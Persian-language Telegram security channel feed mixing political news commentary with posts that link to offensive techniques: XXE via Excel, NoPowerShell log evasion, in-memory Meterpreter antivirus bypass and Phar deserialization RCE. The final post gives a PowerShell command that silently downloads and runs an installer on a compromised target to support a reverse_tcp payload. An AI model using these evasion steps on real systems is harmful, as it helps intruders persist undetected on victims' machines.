امنیت اطلاعات
847 subscribers
2.38K photos
153 videos
156 files
2.58K links
آخرین اخبار هک، ابزارها و روش های تست نفوذ را در این کانال دنبال کنید

بخش انگلیسی :
https://t.iss.one/sec_nerd_en


برای عضویت در گروه پیام بدید:
@rect00
Download Telegram
گزارش رویترز در مورد وبسایتهایی که اخبار کذب منتشر میکنند و ادعای ارتباط این وبسایتها به ایران!

جان برنان دایرکتور سابق CIA میگوید ایرانی ها بازیگران پیچیده ای در عرصه سایبری هستند.
در این گزارش رویترز نتوانسته است ارتباط این سایتها و صفحات مجازی را با حکومت ایران اثبات کند اما توانسته مرکزی با عنوان International Union of Virtual Media (IUVM) را در پس زمینه ی وبسایتهای مذکور کشف کند که آدرس آن در تهران قرار دارد.
شماره تلفن های ثبت شده برای این مرکز جعلی هستند و تلاش های رویترز برای برقراری ارتباط با گردانندگان این وبسایتها و همچنین حکومت مصر بی نتیجه بوده است.
تعداد این وبسایتها ۷۱ عدد است و آدرسهای قدیمی و شماره تلفن های قبلی آن مربوط به ایران هستند.
بیش از نیم میلیون بازدید کننده ماهانه برای وبسایتها و بیش از یک میلیون دنبال کننده فعال برای صفحات مجازی توسط رویترز تخمین زده شده است.



منبع:
https://www.reuters.com/article/us-cyber-iran-specialreport/special-report-how-iran-spreads-disinformation-around-the-world-idUSKCN1NZ1FT



البته ساخت صفحات و وبسایتهای جعلی با نامها و آدرسهای دلخواه توسط هر کسی قابل انجام است و بیش از دیدگاه فنی در این گزارشات، عدم تحمل حاکمان رسانه ای در مقابل پخش اخباری بجز اخبار مدنظر آنان، به چشم می آید.
پروپاگاندای خبری از سوی دولتهای مختلفی صورت میپذیرد. این سیاستها با سانسور اخبار یا تقطیع آن توسط کشورهای مختلفی،‌برای تاثیرگذاری بر رقبا انجام میشود و این به هیچ وجه قابل کتمان نیست، اما نباید فراموش کنیم دولتهایی که با ارائه این مدارک غیرمستدل اقدام به ایجاد فشار رسانه ای علیه رقبا میکنند، خود پیشروان این بازیها هستند!


#news
#iran
#usa
#russia
#yemen
#syria


@sec_nerd
خلاصه متن : سلام من خیلی فقیر هستم و مجبور شدم لپتاپ رو بدزدم ولی گوشی و کیف پول رو نبردم
از فایل های داخل لپتاپ مشخصه که دانشجو هستی اگر فایلی هست که نیاز داری بگو همین جا برات ارسال کنم
بازم معذرت میخوام

منبع : https://twitter.com/StevieBlessed/status/1067579613361131521
@sec_nerd
جستجوی آسان اکسپلویت در بات
@GetSploitBot


#exploit
#pentest
#telegram

@sec_nerd
اکسپلویت آسیب پذیری XXE با استفاده از آپلود فایل Excel

https://www.4armed.com/blog/exploiting-xxe-with-excel/


نکته: سعی کنید کلیات کار رو در لینک بالا بخونید اما ممکنه فایل اکسل تولید شده در لینک بالا مشکل داشته باشه. برای حل شدن مشکل فایل تولیدی، فایلی که این کاربر در لینک زیر ارسال کرده رو آنزیپ کنید و توضیحاتش در مورد ادیت فایل و اضافه کردن پیلود رو بخونید:
https://github.com/jmcnamara/excel-reader-xlsx/issues/10


#xxe
#web
#Pentest
#excel


@sec_nerd
رفتارهای کودکانه این روزها همه جا دیده میشه. فوتبال، صداوسیما، مجلس ...
در فضایی که آرمین رادها در حال تاختن هستن، ما دلخوشیمون وزیر جوانی بود که ما و مشکلات ما رو درک کنه و نیمچه حرکتی برای حل شدنشون انجام بده.
اما گویا وزیر محترم، جناب آذری جهرمی صحنه مدیریت و سیاست رو با گروه تین ایجرهای تلگرامی اشتباه گرفتن و برای تقویتِ خیزی که برای اهداف آیندشون برداشتن از هیچ کاری فروگذار نمیکنن،‌ حتی ارسال اسکرین شات!
جناب وزیر .. منم هم سن و سال خودتم و تعجب میکنم از این کارها .. این ره که تو میروی به پاستور ختم نمیشه!

جهت یادآوری: قیمت گوشی، قیمت اینترنت،بکارگیری کارشناسان واقعی آی تی،گزارش هزینه های پیامرسانهای داخلی و خروجیها،مذاکرات با دوروف ،سرویسهای ارزش افزوده، شرطبندیها ...

پوپولیسم ممکنه جواب بده، ولی مشکل ما رو حل نمیکنه!


https://mobile.twitter.com/azarijahromi/status/1068559112512909313


#iran


@sec_nerd
فریمورک NoPowerShell که به زبان سی شارپ نوشته شده و قابلیت اجرای دستورات پاورشل و جلوگیری از لاگ شدن این دستورات توسط ابزارهای امنیتی را دارد.
همچنین میتوان از آن در Cobalt Strike استفاده و دستورات را در حافظه اجرا نمود.

https://github.com/bitsadmin/nopowershell


این فریمورک هنوز کامل نشده و در حال توسعه میباشد.


#windows
#ps
#post_exploit


@sec_nerd
به گوگل اعتماد نکنید!

#google
#fun

@sec_nerd
دستگاه‌های اجرایی ملزم به فعال کردن سامانه پدافند سایبری شدند


البته متن طولانیه و میتونید در لینک منبع کاملش رو بخونید، اینجا فقط بند پ ماده ۵ رو خلاصه میکنم:

دستگاههای اجرایی ملی و استانی موظفند سامانه پدافند رایانیکی(سایبری) دستگاه خود را در سطح ملی و استانی فعال نمایند:

نظام رصد، پایش، تشخیص و هشداردهی تهدیدات سایبری
نظام تعیین وضعیت و مدیریت صحنه پدافند سایبری و پاسخ
نظام کاهش آسیب پذیری، مصون سازی و مقاوم سازی زیرساختهای سایبری
نظام آموزش، تمرین، رزمایش و ارتقای آمادگی و برگزاری رزمایش


دستگاه‌های اجرایی ملی و استانی که سرمایه های ملی سایبری و سرمایه های وابسته به سایبر(حیاتی، حساس و مهم) را در اختیار دارند موظف اند به منظور جلوگیری از نفوذ و مختل نمودن سامانه های نرم افزاری دستگاههای ذی ربط و توسعه آمادگی‌ها، مدیران و کارکنان خود را بر اساس نظام آموزش پدافند سایبری مصوب کمیته دائمی و هدایت و راهبری سازمان آموزش داده و توانمند نمایند.

به منظور ایجاد هماهنگی بین اقدامات و برنامه های پدافند سایبری در دستگاههای اجرایی "کمیته هماهنگی پدافند سایبری" با مسئولیت سازمان/ قرارگاه پدافند سایبری و عضویت مرکز راهبردی افتا (امنیت فضای تبادل اطلاعات)، مرکز ماهر(مدیریت امداد و هماهنگی رخدادهای رایانه ای)، فرماندهی سایبر الکترونیک سپاه و پلیس فتا تشکیل می شود.


منبع:
https://fna.ir/bq6p3r


#iran
#cyber
#security
#news



@sec_nerd
امنیت اطلاعات
دستگاه‌های اجرایی ملزم به فعال کردن سامانه پدافند سایبری شدند البته متن طولانیه و میتونید در لینک منبع کاملش رو بخونید، اینجا فقط بند پ ماده ۵ رو خلاصه میکنم: دستگاههای اجرایی ملی و استانی موظفند سامانه پدافند رایانیکی(سایبری) دستگاه خود را در سطح ملی و…
جستجوهای من برای پیدا کردن "نظام آموزش پدافند سایبری" بی نتیجه بود اگر شما جزییاتی ازش پیدا کردید برای ما بفرستید @chrispal
اما اینکه اعضای کمیته هماهنگی پدافند سایبری رو میبینید و ممکنه با خودتون فکر کنید که «مگه تا حالا امورات دفاع سایبری دست همینا نبود؟» یه کمی ممکنه حس بشه که چیزی قرار نیست تغییر کنه!
کارشناسان کاربلد امنیت رو برخلاف شعار ابتدایی جناب وزیر جهرمی، کسی تحویل نگرفته و نمیگیره و مشخص نیست اون قسمت آموزش مدیران و کارکنان رو چه کسی باید انجام بده.
اگر سطح آموزش ها در حد پیج اینستاگرام باشه،‌اساتیدی مثل بهروز کمالیان و آرمین راد، دردانه های امنیت سایبری رو میشه روشون حساب کرد اما امیدوارم اون بخش سرمایه های ملی سایبر (حیاتی، حساس و مهم) رو به اینها نسپرن و همینجوری که هست باقی بمونه، حداقلش اینه که الان سالی یکی دو بار بیشتر با حمله ی سایبری روترهامون از مدار خارج نمیشن!


#iran
#news


راستی مبدع اون کلمه «رایانیکی» رو هم اگر میشناسید یه سلام خاص بهش برسونید 😁😭

@sec_nerd
اجرای پیلودهای Meterpreter در حافظه برای جلوگیری از شناسایی آن توسط آنتی ویروس ها

https://www.n00py.io/2018/06/executing-meterpreter-in-memory-on-windows-10-and-bypassing-antivirus/


در این پست خواهید دید که چگونه میتوان با تولید پیلود و ارسال آن از طریق smb یا webdav (البته راه های زیادی برای انتقال فایل xml تولید شده به سیستم تارگت وجود دارد از جمله نفوذ از طریق وب یا ftp و ...) آن را اجرا و سشن meterpreter را بر روی سیستم مهاجم بدست آورد.



#msf
#windows
#av
#bypass


@sec_nerd
شرح Phar Deserialization روش جدید اکسپلویت کردن در php است و در WooCommerce منجر به RCE میشود.

https://blog.ripstech.com/2018/phpbb3-phar-deserialization-to-remote-code-execution/


#php
#exploit
#rips
#phpbb3



@sec_nerd
امنیت اطلاعات
اجرای پیلودهای Meterpreter در حافظه برای جلوگیری از شناسایی آن توسط آنتی ویروس ها https://www.n00py.io/2018/06/executing-meterpreter-in-memory-on-windows-10-and-bypassing-antivirus/ در این پست خواهید دید که چگونه میتوان با تولید پیلود و ارسال آن از طریق…
اگر دات نت فریمورک 4 روی سیستم هدف نصب نبود با دستور زیر میتوانید، از طریق پاورشل و بدون جلب توجه، آنرا نصب کنید:

((new-object net.webclient).DownloadFile("https://download.microsoft.com/download/9/5/A/95A9616B-7A37-4AF6-BC36-D6EA96C8DAAE/dotNetFx40_Full_x86_x64.exe","dotNetFx40_Full_x86_x64.exe"))
& .\dotNetFx40_Full_x86_x64.exe /q


روش بر روی ویندوز ۲۰۰۸ r2 تست شده
با کسپرسکای و پیلود reverse_tcp

#msf
#windows
#av
#bypass


@sec_nerd